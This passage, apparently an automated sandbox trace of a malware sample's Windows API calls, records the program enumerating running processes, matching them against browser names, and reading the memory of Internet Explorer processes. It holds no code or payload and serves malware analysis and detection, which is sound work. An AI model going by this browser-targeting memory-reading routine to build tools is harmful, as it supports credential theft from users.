	[0196.310] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.326] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x114c
	[0196.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.326] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.327] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.327] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.327] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.328] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0196.328] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x1150
	[0196.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.328] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0196.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.329] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.329] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0196.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.330] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.330] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0196.330] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x1154
	[0196.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.331] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0196.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.331] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.331] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0196.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.332] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.332] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0196.332] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x1158
	[0196.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.333] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0196.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.333] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.333] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0196.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.333] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.333] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0196.334] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x115c
	[0196.334] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.334] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0196.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.335] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.335] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0196.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.335] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.336] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0196.336] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0196.336] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0196.337] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x1160
	[0196.337] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.337] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0196.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.338] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.338] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.338] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0196.339] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.339] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.339] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0196.340] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x1164
	[0196.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.340] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0196.340] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.340] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.341] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0196.341] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.341] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.341] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0196.342] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x1168
	[0196.342] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.342] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0196.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.343] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.343] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0196.343] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.343] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.343] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0196.344] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x116c
	[0196.344] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.344] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0196.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.345] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.345] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.345] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0196.346] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.346] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.346] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0196.347] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x1170
	[0196.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.347] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0196.347] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.347] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.348] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0196.348] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.348] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.349] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0196.349] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x1174
	[0196.349] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.349] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0196.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.350] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.350] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0196.350] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.350] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.350] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0196.351] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x1178
	[0196.351] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.351] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0196.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.352] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.352] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0196.352] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.352] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.353] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0196.353] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x117c
	[0196.353] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.354] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0196.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.354] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.354] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.354] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0196.355] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.355] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.355] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0196.356] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x1180
	[0196.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.356] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0196.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.356] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.356] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.356] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0196.357] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.357] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.357] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0196.357] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x1184
	[0196.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.358] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0196.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.358] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.358] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0196.358] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.358] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.359] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0196.359] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x1188
	[0196.359] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.359] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0196.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.360] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.360] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.360] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0196.361] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.361] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.361] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0196.362] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x118c
	[0196.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.362] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0196.362] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.362] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.363] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0196.363] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.364] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.364] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0196.365] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x1190
	[0196.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.365] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0196.365] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.365] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.366] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0196.366] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.366] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.366] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0196.367] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x1194
	[0196.367] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.367] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0196.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.368] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.368] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.368] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0196.369] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.369] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.369] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0196.370] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x1198
	[0196.370] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.370] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0196.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.371] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.371] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.371] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0196.372] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.372] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.372] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0196.373] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x119c
	[0196.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.373] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0196.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.373] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0196.373] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.420] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0196.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.420] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.421] NtQueryInformationProcess (in: ProcessHandle=0x119c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0196.421] ReadProcessMemory (in: hProcess=0x119c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0196.421] ReadProcessMemory (in: hProcess=0x119c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0196.421] ReadProcessMemory (in: hProcess=0x119c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0196.421] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0196.421] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0196.422] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x11a0
	[0196.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.422] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0196.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.422] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0196.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.422] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0196.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.423] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.423] NtQueryInformationProcess (in: ProcessHandle=0x11a0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0196.423] ReadProcessMemory (in: hProcess=0x11a0, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0196.423] ReadProcessMemory (in: hProcess=0x11a0, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0196.423] ReadProcessMemory (in: hProcess=0x11a0, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0196.423] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0196.423] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0196.424] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x11a4
